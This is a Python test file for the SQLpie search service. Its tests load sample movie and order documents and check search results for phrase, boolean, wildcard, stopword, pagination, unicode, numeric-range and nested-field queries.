a462aaac2daa439b529868f54a8d20ffe7f8cfde | 56,300 | py | Python | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | 3 | 2016-01-27T19:49:23.000Z | 2020-08-18T13:59:02.000Z | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | null | null | null | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | 1 | 2016-02-01T01:57:54.000Z | 2016-02-01T01:57:54.000Z | # -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
import json
import sqlpie
class ServiceSearcherTests(object):
#
# Service Searcher Tests
#
def run_before_service_searcher_tests(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
books = {"documents":[{"_id":"Back to the Future", "_bucket":"movies","name":"Back to the Future"},{"_id":"Iron Eagle", "_bucket":"movies","name":"Iron Eagle"},{"_id":"1492", "_bucket":"movies","name":"1492"},{"_id":"The Avengers", "_bucket":"movies","name":"The Avengers"},{"_id":"The Matrix", "_bucket":"movies","name":"The Matrix"}, {"_id":"Terminator", "_bucket":"movies","name":"Terminator"},{"_id":"Star Wars", "_bucket":"movies","name":"Star Wars"},{"_id":"The Goonies", "_bucket":"movies","name":"The Goonies"},{"_id":"Iron Man", "_bucket":"movies","name":"Iron Man"},{"_id":"Iron Curtain", "_bucket":"movies","name":"Iron Curtain"},{"_id":"Eagle of Iron", "_bucket":"movies","name":"Eagle of Iron"},{"_id":"hp01", "_bucket":"movies","name":"Harry Potter"},{"_id":"hp02", "_bucket":"movies","name":"Harry Potter"},{"_id":"hp03", "_bucket":"movies","name":"Harry Potter"}]}
response = self.app.post('/document/put', data=json.dumps(books), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_unicode(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"tests","name":"Antonia's"},{"_id":"002", "_bucket":"tests","name":"Misérables"},{"_id":"003", "_bucket":"tests","name":"naïve"},{"_id":"004", "_bucket":"tests","name":"café"}]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_multiple_originals(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"005", "_bucket":"tests","name":"Drive"},{"_id":"006", "_bucket":"tests","name":"Driving"},{"_id":"007", "_bucket":"tests","name":"driving"}]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 250}, {"_id":"002", "_bucket":"orders","order_date":"Jul/12/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 200}, {"_id":"003", "_bucket":"orders","order_date":"Dec/01/2015", "billing":{"state":"fl", "city":"florida"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 300}, {"_id":"004", "_bucket":"orders","order_date":"Mar/15/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"san francisco"}, "total": 450}, {"_id":"005", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida"}, "total": 50}, {"_id":"006", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32}, "total": 50}, {"_id":"007", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipping_date":"Oct/02/2015"}, "total": 50}
], "parsers":["dates"]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_boolean_field_search(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 250}, {"_id":"002", "_bucket":"orders","order_date":"Jul/12/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles","shipped":True}, "total": 200}, {"_id":"003", "_bucket":"orders","order_date":"Dec/01/2015", "billing":{"state":"fl", "city":"florida"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 300}, {"_id":"004", "_bucket":"orders","order_date":"Mar/15/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"san francisco"}, "total": 450}, {"_id":"005", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida"}, "total": 50}, {"_id":"006", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipped":False}, "total": 50}, {"_id":"007", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipping_date":"Oct/02/2015"}, "total": 50}
], "parsers":["dates"]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def test_service_search_01_query_not_found(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"vnzzoasd3if"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 0, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 0, "Actual Response : %r" % json_response
def test_service_search_02_query_wrong_bucket(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Iron Eagle"'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 0, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 0, "Actual Response : %r" % json_response
def test_service_search_03_query_quote(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Iron Eagle" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_04_query_multiple(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_05_query_not_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron -man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_06_query_misplaced_not_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"- man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == False, "Actual Response : %r" % json_response
assert "Expected W:(abcd...)" in json_response["err"], "Actual Response : %r" % json_response
def test_service_search_07_query_or_operator_within_parenthesis(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(eagle OR man) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_08_query_and_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron AND man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_09_query_parenthesis_only(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(man) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_10_query_parenthesis_only_multiple(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(iron) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_11_query_or_not_operators_parenthesis(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(iron OR eagle) -man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_12_query_misplaced_quote(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"iron eagle -man _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == False, "Actual Response : %r" % json_response
assert "Expected \"\"\"" in json_response["err"], "Actual Response : %r" % json_response
def test_service_search_13_query_field_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"name:terminator _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_14_query_field_or_phrase_parenthesis_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'(name:terminator) OR "star wars" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_15_query_double_wildcard_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"termin* or goon* _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_16_wildcard_phrase_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'ter* or "goonies" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_17_multiple_field_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"name:Harry or name:terminator _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_18_ignore_stopwords_and_return_all(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 10, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 10, "Actual Response : %r" % json_response
def test_service_search_19_ignore_stopwords(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_20_add_new_stopwords(self):
request = {"bucket":"_STOPWORDS", "key":"matrix"}
response = self.app.post('/caching/add', data=json.dumps(request), content_type = 'application/json')
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 10, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 10, "Actual Response : %r" % json_response
def test_service_search_21_remove_stopwords(self):
request = {"bucket":"_STOPWORDS", "key":"matrix"}
response = self.app.post('/caching/remove', data=json.dumps(request), content_type = 'application/json')
# Build index with new stopword
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_23_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":1,"start":1}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_24_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":2,"start":2}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_25_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":2,"start":1}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_26_unicode_characters_index_and_search(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia's or Misérables or naïve or café _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'002', u'name': u'Mis\xe9rables'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'003', u'name': u'na\xefve'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'004', u'name': u'caf\xe9'}], "Actual Response : %r" % json_response
def test_service_search_27_unicode_characters_index_only(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia's or Miserables or naive or cafe _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'002', u'name': u'Mis\xe9rables'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'003', u'name': u'na\xefve'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'004', u'name': u'caf\xe9'}], "Actual Response : %r" % json_response
def test_service_search_28_unicode_characters_partial_query_stem_search(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}], "Actual Response : %r" % json_response
def test_service_search_29_multiple_term_originals(self):
self.run_before_service_searcher_tests_multiple_originals()
response = self.app.post('/service/search', data=json.dumps({"q":"Driving _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'Driving _bucket:tests', u'documents': [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'005', u'name': u'Drive'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'006', u'name': u'Driving'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'007', u'name': u'driving'}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_30_query_quote_with_stopwords_a(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Eagle Iron" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'"Eagle Iron" _bucket:movies', u'documents': [{u'_score': 1.0, u'_bucket': u'movies', u'_id': u'Eagle of Iron', u'name': u'Eagle of Iron'}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_31_query_quote_with_stopwords_b(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Eagle of Iron" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'"Eagle of Iron" _bucket:movies', u'documents': [{u'_score': 1.0, u'_bucket': u'movies', u'_id': u'Eagle of Iron', u'name': u'Eagle of Iron'}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_32_query_all_bucket_documents(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"_bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 7, "Actual Response : %r" % json_response
def test_service_search_33_query_numeric_operator_equal(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":'total:=250 _bucket:orders'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:=250 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_34_query_numeric_operator_gt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>250 _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_35_query_numeric_operator_get(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>=300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>=300 _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_36_query_numeric_operator_lt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:<250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:<250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_37_query_numeric_operator_let(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:<=250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:<=250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 5}, "Actual Response : %r" % json_response
def test_service_search_38_query_numeric_operator_all_inclusive_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>=250&<=300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>=250&<=300 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_39_query_numeric_operator_non_inclusive_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>200&<300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>200&<300 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_40a_query_nested_field_invalid_value(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:pa _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:pa _bucket:orders', u'documents': [], u'num_results': 0}, "Actual Response : %r" % json_response
def test_service_search_40b_query_nested_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:ca _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:ca _bucket:orders', u'documents': [{u'total': 250, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.290219, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'_id': u'001'}, {u'total': 300, u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.266435, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'_id': u'003'}, {u'total': 200, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.243461, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'_id': u'002'}, {u'total': 450, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.229199, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'_id': u'004'}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_41_query_multiple_nested_fields(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:ca billing.city:florida _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:ca billing.city:florida _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.376796, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}], u'num_results': 1}, "Actual Response : %r" % json_response
